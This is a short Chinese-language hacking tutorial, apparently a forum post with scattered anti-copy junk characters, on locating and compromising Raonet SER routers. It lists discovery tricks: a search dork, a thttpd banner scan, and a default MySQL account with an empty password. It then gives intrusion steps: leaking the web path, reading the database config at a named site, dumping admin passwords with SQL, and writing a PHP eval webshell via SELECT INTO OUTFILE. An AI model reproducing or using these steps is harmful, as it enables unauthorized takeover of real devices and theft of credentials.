寻找存在漏洞的路由器方法:
4 r( k' D# o1 s% R5 a" { Q- I0 G( C& L* N* ^0 j! _% n
1:google搜索'Raonet Subscriber Ethernet Router', r% Q8 k V W# D. r3 B
# p8 I, ~, Q# v K" Z2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001& f; X: t! g, \- e! K% O
' O; d+ { c- [) f4 J
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
0 g) z1 t0 g7 Q
3 Q. j3 |, G% Y; ~7 S//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
* ?1 Z; A, t0 i8 V( V) H$ _6 Z. y6 A* @
; Q! Z M3 H) \
& V3 g0 R" q+ f `% K( q6 U入侵步骤:
) F5 i, U* O4 ?" r W* o# }
/ ]: M1 P/ x4 ?. d) Y6 t4 {1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
) s; I( m1 n+ {& ]3 @6 b" T# Y; T, B) ]$ c; S3 N9 U" g( Z. D
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc1 Q0 L1 @$ L7 s7 z4 [. J
3:得到密码后连接,查看GUI管理密码:4 m9 Y0 {0 _+ |( V- ~ k# B
use ser_500% C) `3 N1 R4 [) t' b7 y0 U9 e
select id,passwd from user;
2 ?& W: u6 U/ V) k9 C4:通过数据库写入webshell,执行命令:( r0 {, V3 _/ @; Q+ f, k
use mysql;% w$ h! \) f* ^' K4 X- R
create table ok(cmd TEXT);7 R8 Z7 E J3 g* p8 y$ }4 c
insert into ok values("<?php @eval($_POST[cmd])?>");. x/ k7 _) V0 |3 s
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
; E6 k- t3 y2 }* j9 vdrop table ok;
7 b4 t( y6 u# [% s' ~. b( Z8 }. t8 Y0 T
5:连接后门shell.php
5 v3 s) q7 o# x: b4 K, {9 p) N6 h! S- @
6. 搞定!5 e6 z# @8 x9 S7 L' Y) `# @! Z
( g, ?1 Y2 V% m J$ I+ m; t2 e/ k0 f
|